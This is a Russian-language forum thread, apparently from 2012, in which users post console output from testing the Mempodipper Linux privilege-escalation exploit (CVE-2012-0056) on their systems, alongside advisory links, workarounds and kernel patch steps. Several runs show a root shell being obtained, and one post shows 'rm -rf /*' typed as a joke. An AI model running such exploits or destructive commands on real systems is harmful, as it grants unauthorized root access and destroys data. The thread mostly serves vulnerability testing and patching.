Ядро 3.2.1:

$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2684/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049a44.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a38.
[+] Executing su with shellcode.
# whoami
root

тоже работает

user@usercomp:/tmp/1$ ./a.out
...
[+] Seeking to offset 0x8049a29.
[+] Executing su with shellcode.
user@usercomp:/tmp/1$

ЧЯДНТ?

https://access.redhat.com/kb/docs/DOC-69129
https://bugzilla.redhat.com/show_bug.cgi?id=782642

Там же - workaround с использованием SystemTap. Другой workaround - убрать пользователям доступ ко всем SUID/SGID программам.

К сожалению, исправление в git от 17-го января привносит другую проблему, сравнительно небольшую (обход RLIMIT_NPROC * RLIMIT_AS):

http://www.openwall.com/lists/oss-security/2012/01/22/5

Дискуссия на /r/netsec:

http://www.reddit.com/r/netsec/comments/os8wl/linux_local_privilege_escalatio

Более старые ядра именно этой атаке не подвержены, но могут быть подвержены схожим атакам через чтение (а не запись) того же /proc/<pid>/mem. Конкретных атак (attack vectors) пока нет (пока не нашли такой программы и такого способа атаки, чтобы это было проблемой безопасности); в теории, это может быть утечка криптографических ключей, хешей паролей и т.п. Исправление этого обсуждается. В любом случае, это будет другой номер CVE.

Debian stable не повержен насколько я понял.

не работает :S

./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/9108/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./a.out -o ADDRESS
[-] Example: ./a.out -o 0x402178

Подозреваю, что уже пофиксено? Тогда в топике дезинформация - Arch не попадает в список.

Это страшно.

Неужели и в наш век в сети можно найти сервис где локальные учетки раздают?

[+] Calculating su padding.
[+] Seeking to offset 0x4021cc.
[+] Executing su with shellcode.
#
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),115(lpadmin),117(admin),122(sambashare)
# rm -rf /*

:)))

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/30336/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x25e0.
[+] Calculating su padding.
[+] Seeking to offset 0x25be.
[+] Executing su with shellcode.
ilya@ILYA:/tmp> whoami
ilya

Это я что то не так делаю, или в openSUSE этого бага нету?

$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/13591/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f9c.
[+] Executing su with shellcode.
# whoami
root

> ./a.out              

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6675/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401dd0.
[+] Calculating su padding.
[+] Seeking to offset 0x401dc2.
[+] Executing su with shellcode.
> whoami

vizor

Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет.

glsa-check -t all
This system is not affected by any of the listed GLSAs

uname -r
3.2.1-gentoo

{den@da_desktop}-> ~ $gcc -o rk rk.c
{den@da_desktop}-> ~ $./rk
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4470/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1524.
[+] Calculating su padding.
[+] Seeking to offset 0x1516.
[+] Executing su with shellcode.
{den@da_desktop}-> ~ $whoami
den

Не работает.

[dAverk@dAverk ~]$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7121/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x21a8.
[+] Calculating su padding.
[+] Seeking to offset 0x2186.
[+] Executing su with shellcode.
[dAverk@dAverk ~]$ whoami
dAverk
[dAverk@dAverk ~]$ uname -a
Linux dAverk.4820TG 3.1.7-1.fc16.x86_64 #1 SMP Tue Jan 3 19:45:05 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[dAverk@dAverk ~]$ cat /etc/redhat-release
RFRemix release 16 (Verne)
[dAverk@dAverk ~]$ id
uid=1000(dAverk) gid=1000(dAverk) группы=1000(dAverk)

uname -a
Linux 3.1.5 #2 SMP Sat Dec 10 22:58:40 EET 2011 i686 Intel(R) Core(TM)2 Duo CPU     E8400  @ 3.00GHz GenuineIntel GNU/Linux

./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/10462/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./mempodipper -o ADDRESS
[-] Example: ./mempodipper -o 0x402178

не работает. %-(

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2478/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1734.
[+] Calculating su padding.
[+] Seeking to offset 0x1726.
[+] Executing su with shellcode.
bash-4.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/5212/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1984.
[+] Calculating su padding.
[+] Seeking to offset 0x1962.
[+] Executing su with shellcode.
[alexander@localhost ~]$ whoami
alexander
[alexander@localhost ~]$ uname -r
2.6.39.4-5.1-desktop
[alexander@localhost ~]$

ROSA 2011 не работает! :)

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/13961/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: /tmp/CVE-201209956 -o ADDRESS
[-] Example: /tmp/CVE-201209956 -o 0x402178

Не работает на 3.0.4-hardened-r5, другого и не ожидал.

/var/abs/core/linux $ cat PKGBUILD |grep CVE-2012-0056
        'CVE-2012-0056.patch')
  # patch for CVE-2012-0056
  patch -p1 -i "${srcdir}/CVE-2012-0056.patch"

uname -a
Linux notebook.blahblah 3.1.9-1.fc16.i686 #1 SMP Fri Jan 13 17:14:41 UTC 2012 i686 i686 i386 GNU/Linux

$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4736/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1524.
[+] Calculating su padding.
[+] Seeking to offset 0x1502.
[+] Executing su with shellcode.
[artem@notebook eatme]$ whoami
artem

Как-то так, в общем.

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12942/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x402298.
[+] Calculating su padding.
[+] Seeking to offset 0x40227d.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2# rm -r /te.cpp
sh-4.2#
...
Бл***

4. ctrl + o
5. # cd fs/proc/
6. # patch ../../2100_proc-mem-handling-fix.patch
7. # make && make modules_install
8. cp arch/<arch>/boot/bzImage /boot/kernel-<version>-gentoo
9. # reboot

ksodete@dev-tester ~ $ ./in
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4157/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x402298.
[+] Calculating su padding.
[+] Seeking to offset 0x40227d.
[+] Executing su with shellcode.
ksodete@dev-tester ~ $ whoami
ksodete
ksodete@dev-tester ~ $

2.6.18-8.el5

ругается на pipe2 (заменил на пайп всё равно не работает - висит на чтении)

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Ptrace_traceme'ing process.
[+] Waiting for ptraced child to give output on syscalls.

---------------

скачал под федору эксплоит с использованием не su а gpasswd - тоже не сработал - даже отрубил  ASLR

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3593/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049900.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x80498f1.
[+] Executing gpasswd with shellcode.
unknown group: 1۰1۰.1ɳ?1�hn/shh//bi��-iR��PS��0

gpasswd: Permission denied

apt-get install -y systemtap linux-image-$(uname -r)-dbg

выдает ошибку '('

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x80499e8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2695/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x80499dc.
[+] Executing su with shellcode.
sh-4.1# test
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)